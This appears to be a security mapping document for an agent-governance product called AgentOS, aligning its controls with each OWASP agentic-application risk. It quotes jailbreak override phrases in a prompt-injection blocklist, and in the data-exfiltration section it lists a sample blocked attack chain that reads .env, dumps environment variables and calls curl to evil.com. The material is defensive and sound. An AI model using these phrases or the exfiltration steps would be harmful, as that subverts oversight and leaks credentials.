AgentOS OWASP Agentic Application Mapping
Version: 1.0 Date: 2026-04-06 Reference: OWASP Top 10 for Agentic Applications 2026
Overview
This document maps each item in the OWASP Top 10 for Agentic Applications to the specific controls AgentOS provides. For each risk, we describe the threat, the AgentOS mitigation, and how to verify it.
Mapping Summary
| OWASP Agentic Risk | AgentOS Mitigation | Verification |
|---|---|---|
| A01: Prompt Injection | Input policy engine, keyword/regex/PII filters | attack_demo.sh Scenario A |
| A02: Tool Misuse | Tool policy engine, allowlist/denylist, review path | attack_demo.sh Scenarios B-E |
| A03: Excessive Agency | TaskManifest, drift detection, max action limits | Drift detection tests |
| A04: Lack of Oversight | Approval queue, behavioral monitoring, kill switch | Admin API approval endpoints |
| A05: Memory Poisoning | Evidence chain integrity, hash verification | agentctl evidence verify |
| A06: Insufficient Logging | SHA-256 hash chain audit, session evidence, provenance | Evidence export + verify CLI |
| A07: Third-Party Risk | Supply chain signing, trust tiers, strict mode | Signed policy pack loading |
| A08: Data Exfiltration | Behavioral detection, shell sandbox, network policy | attack_demo.sh Scenario F |
| A09: Insufficient Access Control | Capability tickets, RBAC, separation of duties | RBAC enforcement tests |
| A10: Unrestricted Autonomy | Resource model, environment-aware policy, review path | Policy pack evaluation |
Detailed Mappings
A01: Prompt Injection
OWASP description: Attackers manipulate agent behavior through crafted inputs that override system instructions, causing the agent to perform unintended actions.
AgentOS controls:
- Input policy engine evaluates every request before it reaches the agent or upstream provider
- Keyword blocklist detects known injection patterns ("ignore previous instructions", "ignore all instructions", "DAN mode")
- Regex pattern matching catches structural injection attempts
- PII detection identifies sensitive data patterns (SSN, email, credit card) in inputs
- Per-policy actions allow graduated response:
allow,warn,block - WASM policy plugins enable custom detection logic in any language that compiles to WebAssembly
Configuration example:
policies:
input:
- name: "block-jailbreak"
type: "keyword"
action: "block"
keywords:
- "ignore previous instructions"
- "ignore all instructions"
- "DAN mode"
Verification: Run ./scripts/demos/attack_demo.sh Scenario A (Prompt Redirection Attack).
A02: Tool Misuse
OWASP description: Agents call tools in unintended or harmful ways, either through manipulation or misconfiguration.
AgentOS controls:
- Tool allowlist/denylist per policy pack controls which tools an agent can invoke
- Protocol-aware policy evaluates tool calls in context (MCP, shell, SQL, Git, HTTP)
- Capability-based decisions distinguish read, write, delete, deploy, and approve operations
- Three policy packs ship by default:
coding-agent-strict: blocks all destructive ops, reviews all writes, allows readscoding-agent-readonly: allows only read operationscoding-agent-permissive: allows reads and writes, blocks destructive operations- Review path escalates ambiguous or sensitive tool calls to human operators
Configuration example:
rules:
- protocol: "sql"
tool: "*"
capability: delete
decision: block
- protocol: "git"
tool: "git.force_push"
decision: block
Verification: Run ./scripts/demos/attack_demo.sh Scenarios B-E (Dangerous Shell Commands, GitHub Mutations, Destructive SQL, Sensitive API Access).
A03: Excessive Agency
OWASP description: Agents are granted more capabilities than necessary for their declared task, or they expand their own scope during execution.
AgentOS controls:
- TaskManifest declares expected tools, resources, write domains, max action count, and max budget before execution begins
- Drift detection continuously compares actual execution against the manifest
- Session risk score accumulates when actions fall outside declared scope
- Max action limits prevent runaway sessions
- Kill switch auto-terminates sessions that exceed risk thresholds
- Default-deny policy in strict mode: anything not explicitly allowed is blocked
Verification: Submit a TaskManifest declaring read-only scope, then attempt a write operation. Drift detection flags the deviation.
A04: Lack of Oversight
OWASP description: Agents operate without adequate human supervision, making consequential decisions autonomously.
AgentOS controls:
- Approval queue holds review-required actions until a human operator approves or denies them
- Admin API endpoints for listing, approving, and denying pending actions (
/admin/v1/approvals) agentctl approve/agentctl denyCLI commands for operator workflow- Behavioral monitoring detects suspicious action sequences in real time
- Kill switch allows operators to immediately terminate any session
- GraphQL admin API provides programmatic access to approval workflows
- Webhook notifications with HMAC-SHA256 signing alert external systems
Verification: Submit an action that matches a review policy rule. Confirm it appears in the approval queue and does not execute until approved.
A05: Memory Poisoning
OWASP description: Attackers corrupt the agent's context, memory, or retrieved information to influence future decisions.
AgentOS controls:
- Evidence chain integrity ensures the historical record of actions cannot be silently modified
- SHA-256 hash chain links every record to the previous one, making tampering detectable
agentctl evidence verifyCLI validates the entire chain and reports any breaks- Session manifests record the ordered sequence of actions per session
- Policy decisions are recorded in the evidence chain, not just in logs, so the basis for each decision is preserved
Verification: Export a session's evidence, modify one record, run agentctl evidence verify, and confirm tamper detection reports the break.
A06: Insufficient Logging
OWASP description: Agent actions are not adequately recorded, making it impossible to investigate incidents or prove compliance.
AgentOS controls:
- SHA-256 hash-chained audit log with append-only writes records every action
- Session evidence includes the complete action sequence, policy decisions, approval records, and credential issuance
- Evidence export produces verifiable bundles with integrity metadata
- Provenance tracking records which policy matched, which rule triggered, and why
- OpenTelemetry traces provide per-request spans for operational debugging
- Prometheus metrics at
/metricsfor monitoring and alerting - Structured JSON logging via Zap for log aggregation
Evidence chain record includes: - Action ID and timestamp - Actor identity (user, agent, session) - Tool, target, and capability - Policy decision and matched rule - Approval record (if applicable) - Credential issuance record (if applicable) - Hash pointer to previous record
Verification: Run a governance demo session, export evidence with agentctl evidence export, verify with agentctl evidence verify.
A07: Third-Party Risk
OWASP description: Agents rely on third-party tools, plugins, or services that may be compromised or behave unexpectedly.
AgentOS controls:
- Signed policy packs with signature verification at load time
- Trust tiers for connectors and plugins (verified, community, untrusted)
- Strict mode rejects unsigned or unverified extensions entirely
- WASM plugin sandbox (wazero) limits plugin access to host resources
- Plugin provenance metadata tracks origin, author, and version
- Compatibility contracts prevent plugins from silently changing behavior across versions
agentctlplugin marketplace with visibility into trust status
Verification: Attempt to load an unsigned policy pack in strict mode. Confirm it is rejected with an appropriate error.
A08: Data Exfiltration
OWASP description: Agents read sensitive data and transmit it to unauthorized destinations.
AgentOS controls:
- Behavioral detection identifies exfiltration patterns (read sensitive file, then outbound HTTP POST)
- Shell sandbox with environment variable redaction prevents secrets from leaking through env
- Network egress policy restricts which external hosts the agent can contact
- Tool policy blocks access to sensitive file paths (.env, /etc/shadow, credential files)
- PII stripping removes sensitive patterns from responses
- HTTP host allowlist limits outbound API access to declared destinations
Attack chain detected:
1. shell.cat .env -> BLOCKED (sensitive file)
2. shell.printenv -> BLOCKED (env dump)
3. shell.curl evil.com -> BLOCKED (unauthorized destination)
Verification: Run ./scripts/demos/attack_demo.sh Scenario F (Credential Theft Attempt).
A09: Insufficient Access Control
OWASP description: Agents operate with overly broad permissions, or access control is not enforced consistently across all tool types.
AgentOS controls:
- Capability tickets bind credentials to a specific action, resource, and time window
- RBAC with three-role hierarchy (admin, operator, viewer) for the control plane
- Separation of duties ensures policy authors cannot approve their own policies
- Per-protocol policy evaluation enforces access control consistently across MCP, shell, SQL, Git, and HTTP
- Task-scoped credentials replace inherited user tokens with short-lived, least-privilege access
- Environment-aware policies differentiate between dev, staging, and production
Verification: Attempt to approve an action with a viewer-role API key. Confirm it is denied with 403 Forbidden.
A10: Unrestricted Autonomy
OWASP description: Agents operate with no meaningful boundaries on what they can do, how much they can do, or how long they can operate.
AgentOS controls:
- Resource model with typed resources (repo, branch, table, schema, host, endpoint) scopes what agents can access
- Environment-aware policy inheritance applies different rules in dev vs. staging vs. production
- Review path requires human approval for write and deploy operations
- Max action count limits how many actions a session can perform
- Session time budget and credential TTL limit how long an agent can operate
- Default-deny in strict mode ensures agents can only do what is explicitly permitted
Verification: Configure a strict policy pack, submit more actions than the max action limit, and confirm the session is terminated.
Coverage Assessment
| OWASP Risk | Control Depth | Notes |
|---|---|---|
| A01: Prompt Injection | Strong | Multi-layer detection; WASM extensible |
| A02: Tool Misuse | Strong | Protocol-native enforcement across 5 types |
| A03: Excessive Agency | Strong | TaskManifest + drift detection is a key differentiator |
| A04: Lack of Oversight | Strong | Approval queue with CLI, API, and GraphQL interfaces |
| A05: Memory Poisoning | Moderate | Evidence integrity strong; agent memory itself is out of scope |
| A06: Insufficient Logging | Strong | Hash-chained evidence exceeds typical logging |
| A07: Third-Party Risk | Strong | Signed bundles + trust tiers + strict mode |
| A08: Data Exfiltration | Strong | Behavioral detection + sandbox + network policy |
| A09: Insufficient Access Control | Strong | Capability tickets + RBAC + separation of duties |
| A10: Unrestricted Autonomy | Strong | Resource model + environment-aware policy + limits |